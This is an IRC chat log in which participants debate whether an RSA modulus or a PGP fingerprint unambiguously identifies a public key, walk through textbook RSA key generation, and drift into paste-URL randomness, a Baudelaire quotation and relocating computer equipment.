no doubt as to which key is in discussion. 1734504;1510178497;mircea_popescu;asciilifeform what, we're going to share Ns now ? 1734505;1510178523;asciilifeform;not deliberately, lol. but if you don't know my e , you can't encrypt to me. 1734506;1510178527;mircea_popescu;so i can't. 1734507;1510178528;asciilifeform;just same as if you did not know the n. 1734508;1510178535;asciilifeform;so they are both rightfully part of a pubkey. 1734509;1510178543;mircea_popescu;but a third party asked for N knows WHAT key is being discussed. which is the point of labeling keys. 1734510;1510178546;asciilifeform;the historic cheat was to standardize the e. which imho was retarded. 1734511;1510178563;mircea_popescu;make an effort and distinguish betwen the thing and the thing's name. 1734512;1510178573;asciilifeform;enemy can offer a diddled key with your n but his e, that he can decrypt encrypts to. 1734513;1510178579;asciilifeform;names are not involved. 1734514;1510178593;mircea_popescu;yes, koch fps are ineptly chosen names. yes there's value in having a biunivocal name-item relation by default. 1734515;1510178607;mircea_popescu;NO, this doesn't explode to where everey possible PROPERTY of the item is now also going to be detailed in the name. 1734516;1510178614;asciilifeform;re fps yes. re 'e is part of a pubkey' - it is. 1734517;1510178628;asciilifeform;not knowing the e has exactly same effect as not knowing half of the n. 1734518;1510178633;mircea_popescu;whether e is or is not part of pubkey was not at any point discussed by anyone other than yourself ; 1734519;1510178658;mircea_popescu;much like whether fps are or are not useful wasn't discussed by anyone but yourself. the original problem was that gpg unreliably reported "key doesn't expire" to lobbes , when in fact it did expire. 1734520;1510178664;asciilifeform;it is relevant to the screaming wrongness of http://btcbase.org/log/2017-11-08#1734499 statement. 1734521;1510178664;a111;Logged on 2017-11-08 22:01 mircea_popescu: modulus completely identifies a key. 1734522;1510178671;asciilifeform;it does no such thing . 1734523;1510178673;mircea_popescu;it does. 1734524;1510178687;mircea_popescu;there can be no doubt as to which key is being referenced if the reference consists of modulus. 1734525;1510178711;mircea_popescu;that this reference is not functional, which is to say does not substitute for the thing it references, is a trivially true and entirely spurious observation. 1734526;1510178748;asciilifeform;mircea_popescu's key with altered pubexp is a valid key, and not mechanically distinguishable from the original's in the absence of sigs. 1734527;1510178773;mircea_popescu;so trinque gets a notification that hey, you got the wrong ITEM stored under reference X. 1734528;1510178789;hanbot;mircea_popescu> i am (i guess?) proud to say that ro pron party included womenz to my knowledge. wtf is the point without, they jack off on the zacusci ? << issat a typo or is a jacuzzi fulla zacusca a thing?! 1734529;1510178796;mircea_popescu;this isn't something to be bruteforced through protocol. people can keep cabbage in pots labeled sugar all they want. 1734530;1510178807;asciilifeform;with this argument you could justify arbitrarily breakable fp, say. 1734531;1510178808;mircea_popescu;hanbot approximate russian plural. 1734532;1510178814;asciilifeform;'can always find right key' 1734533;1510178822;mircea_popescu;asciilifeform we are currentrly using arbitrarily breakable fp. 1734534;1510178835;mircea_popescu;the detriment has yet to materialize. 1734535;1510178844;asciilifeform;has yet to materialize to naked eye. 1734536;1510178851;mircea_popescu;let's redo this exercise 1734537;1510178854;mircea_popescu;!!key asciilifeform 1734538;1510178854;asciilifeform;are we building a thousand year reich or not, lol 1734539;1510178855;deedbot;http://wot.deedbot.org/17215D118B7239507FAFED98B98228A001ABFFC7.asc 1734540;1510178867;mircea_popescu;if the above read, like ben_vulpes 's paste, five letters in base64, we'd be none the poorer. 1734541;1510178879;asciilifeform;20-50k usd gets you another 17215D118B7239507FAFED98B98228A001ABFFC7-sha1 but diff modulus. 1734542;1510178897;mircea_popescu;so ? 1734543;1510178900;asciilifeform;that nobody saw it fit yet to do this in front of asciilifeform's face, is neither here nor there 1734544;1510178923;asciilifeform;you build bridge for 500 tanks, not for the wheelbarrows crossing river to date. 1734545;1510178955;mircea_popescu;$0 usd gets you a "boat" in the sense you contemplated back at http://btcbase.org/log/2017-06-21#1672940 1734546;1510178955;a111;Logged on 2017-06-21 14:33 mircea_popescu can buy used cars. CARS. because i bought and own hundreds. i can't buy fucking used boats, and i doubt you can (or would, or do for that matter) buy used cars. 1734547;1510178981;mircea_popescu;but somehow commerce hasn't come at astandstill by the fact that you can call a folded sheet of paper as well as a 100`000 ton transport item "boat" 1734548;1510179014;trinque;asciilifeform: what'd change in deedbot's key repository if somebody collided your key fp ? 1734549;1510179016;asciilifeform;the historic 'it wasn't visible broken in my face' can justify any kind of shitcrypto, the use of winblowz, whatever customary syphilis . i ain't buying. 1734550;1510179021;mircea_popescu;the four letter, base 26 hash works remarkably well. 1734551;1510179038;mircea_popescu;asciilifeform you're evidently buying, seeing how, let's do it the third time... 1734552;1510179040;mircea_popescu;!!key asciilifeform 1734553;1510179041;deedbot;http://wot.deedbot.org/17215D118B7239507FAFED98B98228A001ABFFC7.asc 1734554;1510179045;mircea_popescu;i woder what has to happen for it to stick. 1734555;1510179060;trinque;I'll go change to to encode the FP as repititions of the string "cocks" to signify 1734556;1510179078;asciilifeform;after bath (ffa) is built, i have 0 intention of continuing to rub against tree trunk to clean. 1734557;1510179092;mircea_popescu;so what does this practically do ? 1734558;1510179095;asciilifeform;dun matter for how long it was state of the art in my chukchistan. 1734559;1510179111;*;mircea_popescu was rather toying with the idea of standarizing ben_vulpes 's identifier thing across teh republic. 1734560;1510179115;asciilifeform;discussion is re permanent design for sane crypto. 1734561;1510179144;asciilifeform;mircea_popescu: why not take to logical conclusion : 1 bit : 1 == mircea_popescu , 0 == everybdy else, lol 1734562;1510179150;mircea_popescu;them 04YcZ or w/es are working splendidly well 1734563;1510179165;asciilifeform;the ham radio people still have iirc what, 5 letter names 1734564;1510179174;asciilifeform;( they die faster than born , so no shortages ) 1734565;1510179186;BingoBoingo;The cool ones four, at some point six+ 1734566;1510179186;asciilifeform;however they don't use hashes, so no collisions 1734567;1510179191;mircea_popescu;the fact that we're still using a what was it, 400 char line protocol has some bearing on what we call things. 1734568;1510179199;mircea_popescu;i'm not even sure i want gossipd lines to be longer than irc. 1734569;1510179201;trinque;all deedbot is offering up is an identifier within its own namespace for the - yes - full key 1734570;1510179208;mircea_popescu;imo it's a schelling point found at considerable expense and of significant value 1734571;1510179220;asciilifeform;as i see it it's an arbitrary turd. 1734572;1510179238;mircea_popescu;i had nfi you object to names as a matter of principle. 1734573;1510179240;asciilifeform;mircea_popescu balked at 'unfragging udp is 512byte' but for some reason doesn't barf at irc 1734574;1510179254;asciilifeform;crypto sigs are to be unambiguous. is the entire point of'em. 1734575;1510179266;asciilifeform;like knife exists solely to cut. 1734576;1510179273;mircea_popescu;how do you even put up with "asciilifeform" in the first place ? shouldn't it be stanisalvborninodessaandflownbyparentsacrossseaatcostofsellingitemsfromhouseandalsodoesntlikewashingtondcandhasagirlandahouseblablabla ? 1734577;1510179284;asciilifeform;you can't sign with either. 1734578;1510179298;asciilifeform;the pubkey is the man. per mircea_popescu's own theory and practice. 1734579;1510179300;mircea_popescu;what's signing got to do with the discussion ? 1734580;1510179310;asciilifeform;because it is about pubkey ? 1734581;1510179316;mircea_popescu;not afaik ? 1734582;1510179348;asciilifeform;what then, instead, about fram, ursul polar ? 1734583;1510179389;mircea_popescu;well, at first it was about lobbes warning people not to rely on the "control dials" as provided by koch-gpg, for being unreliable ; then you wanted to talk about fps and then at some point and without warning anyone apparently pivoted to talking about pubkeys and signatures. 1734584;1510179400;asciilifeform;it's about asciilifeform reviewing for davout why http://btcbase.org/log/2017-04-09#1640824 was on point 1734585;1510179400;a111;Logged on 2017-04-09 14:45 mircea_popescu: asciilifeform incidentally, the more i think about it the more i'm convinced the ONLY "fingerprint" for rsa key may be... the modulus. 4096 bits and fuck you, if you can't take 32 chars you don't belong here. 1734586;1510179415;mircea_popescu;aha. 1734587;1510179437;mircea_popescu;as i said, making the modulus be the name has its advantages. 1734588;1510179447;asciilifeform;above however was written prior to discarding 'let's all 4evah use 65537' 1734589;1510179449;mircea_popescu;but this dun include es, pictures, nicks, other comments. it includes N. 1734590;1510179460;mircea_popescu;we don't agree on how that changes anything. 1734591;1510179466;mircea_popescu;besides, some keys still use 3 or 17 or w/e. 1734592;1510179469;asciilifeform;because e is a free variable ? 1734593;1510179479;mircea_popescu;e always was a free variable. 1734594;1510179609;mircea_popescu;in any case. there's no requirement that you be able to use the word "car" to go shopping in it ; and similarily there's no requirement that you be able to use a key's fingerprint to sign, or check signatures with it. the intention of the fingerprint is to permit you to reference a specific key unambiguously to a third party, such as when asking for it. 1734595;1510179626;asciilifeform;if e is free variable ( vs. '65537 4evah 4all' ) then having n is having half a pubkey. 1734596;1510179667;mircea_popescu;well, and having "asciilifeform" or "17215D118B7239507FAFED98B98228A001ABFFC7" is having no portion of the pubkey. 1734597;1510179672;asciilifeform;the use of a hash ( i.e. item guaranteed not to be 1:1 mapping ) to 'reference unambiguously' to something, is a fractionalreserveism. 1734598;1510179673;mircea_popescu;they're just words denoting a certain pubkey. 1734599;1510179692;mircea_popescu;that's unrelated to this conversation. N is not a hash, it's the modulus. 1734600;1510179770;asciilifeform;does mircea_popescu know a proof that i cannot choose an alternate e that will result in a pubkey that 1) verifies some or all of the existing signatures made with his genuine e + 2) verifies another, which he did not produce ? 1734601;1510179786;mircea_popescu;i'm sorry ? 1734602;1510179814;*;asciilifeform finds that the l0gz do not currently contain a full description of rsa 1734603;1510179824;trinque;http://btcbase.org/log/2017-08-28#1704268 << seems entirely related. asciilifeform says no names because can't derive name from the math. 1734604;1510179824;a111;Logged on 2017-08-28 23:10 mircea_popescu: kanzure " Obviously there is no possiblity of meaning outside of a structure of authority, and the authority can not be predicated on the meaning." 1734605;1510179825;mircea_popescu;what's this "genuine e". rsa is based on p,q,N not on e's. 1734606;1510179832;asciilifeform;let's take interlude to review ? 1734607;1510179837;mircea_popescu;aite ? 1734608;1510179853;asciilifeform;1) we plug in the FG. p, q are primes. n = pq. 1734609;1510179865;mircea_popescu;trinque well yes but the illiterate approach (which is what this is) rapidly devolves into orcdom. 1734610;1510179870;mircea_popescu;asciilifeform go on. 1734611;1510179886;asciilifeform;2) phi = (p-1)(q-1) 1734612;1510179906;asciilifeform;3) choose e, 1 < e < phi , where gcd(e, phi) == 1 1734613;1510179937;asciilifeform;4) compute seekrit d, 1 < d < phi, where e*d === 1 mod phi 1734614;1510179956;asciilifeform;( can also write , d == e^-1 mod phi ) 1734615;1510179987;asciilifeform;output is pub/priv pair; pub is tuble (n,e) , priv is (d, p, q) . 1734616;1510180003;mircea_popescu;right. 1734617;1510180007;asciilifeform;for completeness, let's also note the rsa op : 1734618;1510180019;asciilifeform;c = m^e mod n 1734619;1510180029;asciilifeform;m = c^d mod n 1734620;1510180044;asciilifeform;( same exact op, but different colourings depending on whether encrypting or decrypting ) 1734621;1510180049;asciilifeform;this omits all mention of paddings etc. 1734622;1510180054;asciilifeform;anyone see any typo ? 1734623;1510180059;mircea_popescu;so what's the problem ? 1734624;1510180066;asciilifeform;*tuple 1734625;1510180149;asciilifeform;what happens if you change e to e', e' != e ? 1734626;1510180260;mircea_popescu;whoever wants to decrypt will either know it or not decrypt. 1734627;1510180268;mircea_popescu;or verify sigs, whatever, same op. 1734628;1510180285;*;mircea_popescu shall bbl. 1734629;1510180354;asciilifeform;mircea_popescu may well be right incidentally, re the impossibility of somebody lying about the e in a key, doing any damage . but i cannot yet prove. 1734630;1510180365;asciilifeform;that's what bothers me, that i can't yet prove. 1734631;1510180442;davout;sounds to me as the same fundamental problem re hashes 1734632;1510180450;asciilifeform;http://btcbase.org/log/2017-11-08#1734603 << names are cosmetic. q is re 'what is a complete pubkey' 1734633;1510180450;a111;Logged on 2017-11-08 22:23 trinque: http://btcbase.org/log/2017-08-28#1704268 << seems entirely related. asciilifeform says no names because can't derive name from the math. 1734634;1510180478;asciilifeform;( if tomorrow asciilifeform signs a message 'call me pile_of_cement nao plox' everyone will laugh, but his v-sigs will still stand ) 1734635;1510180481;trinque;no, it wasn't. 1734636;1510180490;trinque;everyone present knows what constitutes a full pubkey 1734637;1510180496;asciilifeform;trinque: i apparently don't 1734638;1510180502;trinque;topic was what to use to reference one, if any 1734639;1510180515;davout;unambiguously 1734640;1510180623;asciilifeform;if tomorrow i sign a message with my key ' asciilifeform fleanode nick was compromised 2ks ago, ignore what the idjit said' -- also stands. names are clothing. 1734641;1510180634;asciilifeform;mechanically linked 'this fp IS the key' item, however, is more insiduous. 1734642;1510180644;asciilifeform;*insidious 1734643;1510180673;asciilifeform;it's a fundamental untruth. because somewhere in phase space, waiting to be found, is 1 ( or 2, or 9000 ) collisions. 1734644;1510180682;trinque;dare I go again? 1734645;1510180690;asciilifeform;the 2 aren't in any way similar. 1734646;1510180691;trinque;what happens to the interactions with deedbot if a collision occurs? 1734647;1510180705;asciilifeform;nuffin, because it doesn't use signatures. 1734648;1510180717;asciilifeform;v-on-gpg however is fucked. 1734649;1510180721;trinque;pretty sure all that was at question was convention for naming keys 1734650;1510180783;asciilifeform;incidentally , if trinque at any point imports the collision-key, it will overwrite the old, silently 1734651;1510180794;asciilifeform;( unsurprising koch mechanics ) 1734652;1510180822;asciilifeform;ditto if faux-asciilifeform sends trinque a pgpgram, 'my new key is...' -- it will verify. 1734653;1510180833;trinque;yep. and so the thing will never do so. anytime someone lets his key expire I've grunted through the item with pgpdump 1734654;1510180838;trinque;*the new item 1734655;1510180855;asciilifeform;hats off to trinque , if he manually inspects moduli. 1734656;1510180880;*;asciilifeform does, whenever fielding new gpgtronic box 1734657;1510181046;asciilifeform;meanwhile, in heathendom, 'parody horizon' -- https://archive.is/cQItH >> 'Facebook tests fighting revenge porn by asking users to file nude photos first' 1734658;1510181082;trinque;looool 1734659;1510181098;shinohai;kek 1734660;1510181122;asciilifeform;betcha it will be unhappened before day is done 1734661;1510181129;asciilifeform;'never happened, hoax, move along.' 1734662;1510182551;*;mircea_popescu has made "varza calita" however you call it, cabbage carmelized with bacon, with CAYENNE paprika. holy shit this is a good idea, had to come to new world to discover. 1734663;1510182600;mircea_popescu;asciilifeform anyway, n without e is not a complete pubkey, hence the e,N,comment standard. nevertheless, N is a sufficient index of the e,N,comment line that properly constitutes a pubkey. 1734664;1510182608;asciilifeform;returning to the exponent thing, seems that mircea_popescu is right, nothing particularly interesting can be done by distributing a pub with e' . ( other than 'believe me , his e is 3' and then messages ~to that pub~ are breakable if padding is broken. but that' sit . ) 1734665;1510182612;mircea_popescu;and the fact that BOTH e and comment are arbitrary is not concerning. 1734666;1510182658;asciilifeform;( it won't affect existing sigs by trooo key , etc ) 1734667;1510182761;asciilifeform;and it's sufficient index until, i suppose , 5000 yrs pass and there are two old sages, each called himself mircea_popescu and each used modulus N, each left great body of alchemical works, but they had different, see, pub-e's.... lel 1734668;1510182761;mircea_popescu;http://btcbase.org/log/2017-11-08#1734650 << this is very much a koch-gpg problem in the vein of "lobbes warning people not to rely on the "control dials" as provided by koch-gpg, for being unreliable" and probably the most important example thereof. 1734669;1510182761;a111;Logged on 2017-11-08 22:39 asciilifeform: incidentally , if trinque at any point imports the collision-key, it will overwrite the old, silently 1734670;1510182780;mircea_popescu;asciilifeform this is a compromised key by definition, two people have the pq 1734671;1510182790;asciilifeform;hm. 1734672;1510182833;asciilifeform;afaik this is so. 1734673;1510182837;mircea_popescu;properly speaking, the two sages are the one sage. 1734674;1510182904;asciilifeform;i dun currently see any crack in this big enough for my crowbar. 1734675;1510182905;mircea_popescu;now to the saddest part of this all, whereby N being 512 bytes long, we can't actually fit them in irc lines. 1734676;1510182931;asciilifeform;i must say even sadder noose, i dun have an rsatron that fits in irc line either... 1734677;1510182957;asciilifeform;i even have a phriend whose postage addr barely fits in one... 1734678;1510182958;mircea_popescu;i suppose necessarily we'll reference them by eg bpaste ids, thereby going right back to the hash. 1734679;1510182994;asciilifeform;can reference by anything convenient. so long as not entertaining the seductive but very dangerous notion that the reference ~is~ the item. 1734680;1510183059;mircea_popescu;right. doing something like "fp is http://p.bvulpes.com/pastes/ququq/?raw=true" instead of "fp is FC66C0C5D98C42A1D4A98B6B42F9985AFAB953C4" has the advantage that the ad-hoc, by time of request hash does not purport any sort of relation with the contents. 1734681;1510183062;mircea_popescu;this is a right thing here. 1734682;1510183090;mircea_popescu;there's a lot of wisdom we ended up baking into teh whole paste thing. 1734683;1510183103;asciilifeform;iirc we had a similar thread re tx-id. 1734684;1510183110;mircea_popescu;which was that ? 1734685;1510183127;asciilifeform;http://btcbase.org/log/2017-04-05#1637598 << possibly here 1734686;1510183127;a111;Logged on 2017-04-05 13:31 asciilifeform: thing is, there is NO sane (i.e. o(1)) way to index without demanding unique global txid. 1734687;1510183143;mircea_popescu;it's a recurrent topic. 1734688;1510183169;mircea_popescu;ben_vulpes how is it implemented btw ? not something directly breakable like "hash the microtime, put through base64 and truncate" is it ? 1734689;1510183206;davout;"how dja generate key paste URL?" "just SHA1 the key" :D 1734690;1510183216;mircea_popescu;lol 1734691;1510183236;davout;problem? 1734692;1510183260;mircea_popescu;ideally the url is not breakable*. (*limits apply) 1734693;1510183316;davout;breakable in what sense? 1734694;1510183361;mircea_popescu;in the sense that third party can predict (by eliminating some as impossible) future urls in whatever manner. 1734695;1510183391;mircea_popescu;ie "today is the 5th so all paste urls will sum to 05ff" or "this item is long therefore the paste will have more caps than small letters" etc 1734696;1510183450;davout;it's not immediately clear to me what this would enable 1734697;1510183478;asciilifeform;ideally the paste magick comes from s := get-string-from-FG followed by see-if-unexpired-paste-with-s-exists 1734698;1510183494;asciilifeform;( if latter is true : make new one ) 1734699;1510183500;mircea_popescu;davout not much ; asciilifeform well we don't yet have fg-capable isps. 1734700;1510183522;asciilifeform;we do as soon as asciilifeform parks a box ! 1734701;1510183562;asciilifeform;but description is general , re 'how to make non-predictable gensym' 1734702;1510183577;asciilifeform;( it can't be a function of the payload, or of the clock ) 1734703;1510183586;mircea_popescu;and the problem is also general, nobody can apply our correct solutions. 1734704;1510183599;asciilifeform;can at least avoid applying the obviously deadly , incorrect one. 1734705;1510183674;asciilifeform;here's a possible idea : why not use mircea_popescu's poker . 1734706;1510183715;asciilifeform;( when submitting url, can throw in optional value that gets xor'd with the server-generated . ) 1734707;1510183727;mircea_popescu;over http ? 1734708;1510183733;asciilifeform;aha? 1734709;1510183738;davout;BYO entropy, can't possibly hurt 1734710;1510183747;mircea_popescu;lol 1734711;1510183755;asciilifeform;this was in old thread, re provably-fair pokerators , mircea_popescu shared the algo. 1734712;1510183778;mircea_popescu;i'm aware, but it works better there than here. 1734713;1510183794;mircea_popescu;poker is login site, bpaste isn't. 1734714;1510183831;asciilifeform;http://btcbase.org/log/2017-09-02#1709684 << 1734715;1510183831;a111;Logged on 2017-09-02 00:04 mircea_popescu: asciilifeform seed is a combo of site-produced TRNG entropy and player-set (with defaults if playher doesn't feel like setting). you can change your portion at any time. 1734716;1510183872;asciilifeform;http POST takes >1 param, neh 1734717;1510183890;asciilifeform;e.g. payload=foo&turd=bar 1734718;1510183933;mircea_popescu;in other utter lulz : "La foule est son domaine, comme l'air est celui de l'oiseau, comme l'eau celui du poisson. Sa passion et sa profession, c'est d'épouser la foule. Pour le parfait flâneur, pour l'observateur passionné, c'est une immense jouissance que d'élire domicile dans le nombre, dans l'ondoyant, dans le mouvement, dans le fugitif et l'infini. Être hors de chez soi, et pourtant se sentir partout chez soi ; v 1734719;1510183934;mircea_popescu;oir le monde, être au centre du monde et rester caché au monde, tels sont quelques-uns des moindres plaisirs de ces esprits indépendants, passionnés, impartiaux, que la langue ne peut que maladroitement définir. L'observateur est un prince qui jouit partout de son incognito." 1734720;1510183956;mircea_popescu;who invented the redditard ? charles baudelaire described it cca 1863. 1734721;1510183966;shinohai;lmao 1734722;1510183999;mircea_popescu;feeding the self the impression of being in the center of the world while at the same time remaining invisible to the world. 1734723;1510184014;mircea_popescu;this is what "anonimity" is hoped to provide to the online tard of 2010s. 1734724;1510184067;asciilifeform;d'épouser la foule << ugh 1734725;1510184082;mircea_popescu;oya. 1734726;1510184089;mircea_popescu;baudelaire is well deranged. 1734727;1510184127;asciilifeform;is this after opium caught on , or wat 1734728;1510184150;asciilifeform;or can we blame syphilis 1734729;1510184152;mircea_popescu;before opium caught on there was a brain there upon which opium will have caught on later on. 1734730;1510184165;mircea_popescu;http://btcbase.org/log/2017-10-18#1726198 1734731;1510184165;a111;Logged on 2017-10-18 17:10 mircea_popescu: stopping smoking doesn't reduce cancer, because the sort of shameful shitsacks that GET cancer will get it, whether from smoking or not. if not from smoking -- they'll find a different stressor. 1734732;1510184185;davout;http://btcbase.org/log/2017-11-08#1734720 <<< bwhaha sainte merde 1734733;1510184185;a111;Logged on 2017-11-08 23:32 mircea_popescu: who invented the redditard ? charles baudelaire described it cca 1863. 1734734;1510184199;asciilifeform;dunno that this carries universally -- could just easily say 'caesar should have grown his chitinous plate on his chest, so as not to be stabbed' 1734735;1510184206;mircea_popescu;indeed. 1734736;1510184222;mircea_popescu;lorica segmentata. it's a thing. 1734737;1510184228;asciilifeform;but re opium specifically mircea_popescu's idea is almost certainly troo : opium isn't actually fun for ~most people 1734738;1510184265;asciilifeform;( nearly everybody at one time went to dentist, or whatever surgeon, got opiated . how many want to take it up ? ) 1734739;1510184307;asciilifeform;http://btcbase.org/log/2016-10-03#1551908 << thread 1734740;1510184307;a111;Logged on 2016-10-03 19:15 asciilifeform: one of the interesting recurring motifs in dalrymple (british dude who worked for decades as prison doctor) re addicts is that they are not 'could be just anybody' 1734741;1510184974;asciilifeform;( re physical handling of pubkeys : another possibly interesting old asciilifeform crackpottery : http://btcbase.org/log/2017-06-01#1664335 ) 1734742;1510184974;a111;Logged on 2017-06-01 18:03 asciilifeform: if you make a ~two~-diode reader, you can make it ignore 'unstraight' (from its pov) bars. and this opens you up to a method : 1734743;1510185046;asciilifeform;( tldr : 13125 bytes on 2sided business card , after luby ) 1734744;1510185109;mircea_popescu;asciilifeform is basically a cognitive arsonist. 1734745;1510185116;asciilifeform;lol! 1734746;1510185128;mircea_popescu;his greatest pleasure is to burn down some thing in this way. 1734747;1510185193;asciilifeform;but from ashes, we get magical bird, which then... or was that in another tale. 1734748;1510185206;ben_vulpes;mircea_popescu: several java-"random" selections from a list of characters 1734749;1510185246;ben_vulpes;the thing predates my membership in thumbsdownforclojureclub 1734750;1510185269;asciilifeform;lol i thought ben_vulpes wrote clojure proggies for a living 1734751;1510185275;asciilifeform;( or he does ? but 'with disgust' ? ) 1734752;1510185287;ben_vulpes;cl and legacy pyshits mostly 1734753;1510185292;asciilifeform;aa 1734754;1510185317;ben_vulpes;i'd rather write java than clojure 1734755;1510185355;ben_vulpes;compiler for the former is at least useful, goes beyond 'meh adequate' 1734756;1510185511;ben_vulpes;resisting the temptation to shit up the logs with clojure hate over here 1734757;1510185527;BingoBoingo;!~later tell shinohai http://wotpaste.cascadianhacker.com/pastes/8fdt3/?raw=true 1734758;1510185528;jhvh1;BingoBoingo: The operation succeeded. 1734759;1510185552;BingoBoingo;ben_vulpes: I thought that was 2013-2014's logs. Just link some classics. 1734760;1510185631;*;ben_vulpes digs briefly through logs, finds only old sads 1734761;1510185809;shinohai;BingoBoingo: http://wotpaste.cascadianhacker.com/pastes/CGRtO/?raw=true 1734762;1510185849;BingoBoingo;tyvm 1734763;1510185895;shinohai;!~ty 1734764;1510185895;jhvh1;You are very welcome Daddy 1734765;1510185926;BingoBoingo;Old meme is best meme 1734766;1510186121;ben_vulpes;asciilifeform: the two-diode crackpottery is definitely a favorite of mine 1734767;1510186303;asciilifeform;incidentally, quick experiment gives http://www.loper-os.org/pub/512_letter_a.png 1734768;1510186313;asciilifeform;which reads just fine with my ancient 'blaster gun' 1734769;1510186317;asciilifeform;right off the lcd. 1734770;1510186348;asciilifeform;( 4096bits ) 1734771;1510186423;asciilifeform;or hm, the iso std says otherwise, it's 1 .. 4296 alphanumerics, but only max 2953 8bit bytes per iso-compliant qr. 1734772;1510186434;asciilifeform;so, eh, you'll need 2 of'em. 1734773;1510186446;asciilifeform;( for standard qrtrons ) 1734774;1510186558;asciilifeform;oh hm nm 1734775;1510186565;asciilifeform;2953 ~bytes~ 1734776;1510186604;asciilifeform;moar than enough for 4096b (512byte) modulus, same size exponent, and massive chunk of errorcode. 1734777;1510186735;asciilifeform;( say, 1024byte (n,e) ; then 512byte signature , of a message, e.g., 'please call me pile_of_cement' ) 1734778;1510186819;BingoBoingo;!~later tell mircea_popescu http://wotpaste.cascadianhacker.com/pastes/7iLaV/?raw=true 1734779;1510186819;jhvh1;BingoBoingo: The operation succeeded. 1734780;1510186848;BingoBoingo;pile_of_cement: Do you have any luggage recommendations for rackmount boxes? 1734781;1510186862;asciilifeform;lol 1734782;1510186876;asciilifeform;look in music 'dj' catalogue, they make cases 1734783;1510186889;asciilifeform;but i prefer the crate the machine shipped in 1734784;1510186894;asciilifeform;is generally good packing. 1734785;1510186995;BingoBoingo;Does airline treat this as a bag or a something else 1734786;1510187005;asciilifeform;if you put it in a bag -- bag. 1734787;1510187013;asciilifeform;if not -- freight 1734788;1510187058;BingoBoingo;And if wrapped in nylon and strapped together in 70 lb units, still bags? 1734789;1510187097;mircea_popescu;BingoBoingo qntra would work fine as a vps off your vps machine im sure. 1734790;1510187109;asciilifeform;afaik if you make it externally baglike (i.e. with handle) and it fits in mass/dimensions given by carrier -- they'll carry it 1734791;1510187135;davout;y u no freight? 1734792;1510187157;asciilifeform;presumably -- miser 1734793;1510187176;BingoBoingo;mircea_popescu: Cool. Mega opteron VPS box it is. 1734794;1510187196;asciilifeform;you also running opterons, BingoBoingo ? 1734795;1510187218;BingoBoingo;davout: Freight happens later as "household", that way duty free. 1734796;1510187239;BingoBoingo;asciilifeform: Pricing boxes. 1734797;1510187247;asciilifeform;what's the duty on an ancient comp anyway 1734798;1510187251;davout;you'd need to actually move yourself for that to be an option, no? 1734799;1510187261;BingoBoingo;davout: That is plan 1734800;1510187270;*;asciilifeform recalls rolling crate of pogos, for c3, and paying 0 because nobody wanted to try to compute duty 1734801;1510187302;davout;aok, hence the .br residence permit talks 1734802;1510187320;BingoBoingo;asciilifeform: Depends on what I call the computer. Uruguay however has actual charts. 1734803;1510187548;BingoBoingo;davout: And hence not Brazil parallel search becoming very attractive. Brazil is slow. Anyways the reason BingoBoingo has been condensing physical plant is that there are many compelling anti-reasons to operate ISP in US. 1734804;1510187651;BingoBoingo;!~ticker --market all 1734805;1510187657;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7419.67, vol: 24758.34621988 | Bitfinex BTCUSD last: 7380.0, vol: 97961.33501621 | Kraken BTCUSD last: 7426.5, vol: 6258.26612398 | Volume-weighted last average: 7389.8712454 1734806;1510187858;asciilifeform;BingoBoingo: there is not such a thing as a sane fiatolistan. but otoh it is difficult to do worse than usa. 1734807;1510188013;asciilifeform;http://btcbase.org/log/2017-11-09#1734789 << for that matter would work even better on a 'pcengines' or other small machine with GB nic + ssd . 1734808;1510188013;a111;Logged on 2017-11-09 00:24 mircea_popescu: BingoBoingo qntra would work fine as a vps off your vps machine im sure. 1734809;1510188030;asciilifeform;( even, say, a pogo ) 1734810;1510188042;asciilifeform;how much does the workingset weigh, BingoBoingo ? 1734811;1510188058;asciilifeform;( is it even over 100 MB ? ) 1734812;1510188064;ben_vulpes;in other news, vancouver washington elected a dead man to city council 1734813;1510188076;BingoBoingo;Prolly not going that small. Qntra may get own box E350 or similar AMD 1734814;1510188096;BingoBoingo;asciilifeform: More than that less than 1 GB. Document dumps and pictures, etc 1734815;1510188195;asciilifeform;pretty compact. 1734816;1510188219;BingoBoingo;Yes, but DB intensive. 1734817;1510188253;asciilifeform;fits in ram, and prolly will for foreseeable future. 1734818;1510188258;asciilifeform;so not really i/o-bound 1734819;1510188309;*;BingoBoingo will likely leave 1/2" drive socket kit behind 1734820;1510188355;asciilifeform;aaa ~that~ is what BingoBoingo meant by 'condense physicals' 1734821;1510188373;asciilifeform;asciilifeform likewise will have a rail car's worth of goodies to liquidate 1734822;1510188398;asciilifeform;anybody want 1958 'britannica' ? 60 yrs of 'sci am' ? co2 laser ? lol 1734823;1510188412;BingoBoingo;You're leaving the LASER! 1734824;1510188419;asciilifeform;didja think it could come ?! 1734825;1510188427;asciilifeform;any idea what the thing weighs 1734826;1510188432;asciilifeform;or how breakable. 1734827;1510188434;BingoBoingo;No idea at all 1734828;1510188458;asciilifeform;sorta like a ming vase in a steel coffin ( sized for a 5 y.o. ) 1734829;1510188464;BingoBoingo;ah 1734830;1510188474;asciilifeform;plus compressor, exhaust pump, water chiller. 1734831;1510188479;ben_vulpes;a 58 britannica?! 1734832;1510188484;asciilifeform;aha 1734833;1510188493;asciilifeform;with indices. 1734834;1510188497;ben_vulpes;glorious 1734835;1510188501;asciilifeform;and buncha else. 1734836;1510188505;ben_vulpes;we had a shit 90s 1734837;1510188506;asciilifeform;the lispm is finally gone tho. 1734838;1510188520;BingoBoingo;!~later tell pete_dushenski http://btcbase.org/log/2017-11-09#1734821 << You want in on the alf firesale? 1734839;1510188520;a111;Logged on 2017-11-09 00:46 asciilifeform: asciilifeform likewise will have a rail car's worth of goodies to liquidate 1734840;1510188520;jhvh1;BingoBoingo: The operation succeeded. 1734841;1510188533;asciilifeform;2 dec alphas remain, plus a megatonne of other yet-uncatalogued . 1734842;1510188568;BingoBoingo; we had a shit 90s << My fambly poor. Grew up with bullshit Funk & Wagnalls 1734843;1510188587;asciilifeform;other notable junk includes.... cnc milling machine ( asciilifeform-built controller , brand-new steppers ) 1734844;1510188644;asciilifeform;and i think this completes the list of items somebody in l1 might actually want. 1734845;1510188755;asciilifeform;BingoBoingo: http://btcbase.org/log/2017-05-14#1655937 thread 1734846;1510188755;a111;Logged on 2017-05-14 17:29 asciilifeform: asciilifeform had a 1958 'britannica', made in usa, that he fished out of a dumpster as a boy. it was superb, as far as encyclopaedia goes, about on par with famous большая советская энциклопедия . but today it lives packed in a crate. 1734847;1510188827;asciilifeform;i suppose i oughta also mention 2 21-inch trinitrons, one of which -- brand-new, ~1hr of runtime. 1734848;1510188914;asciilifeform;buncha other various ( laser printers, 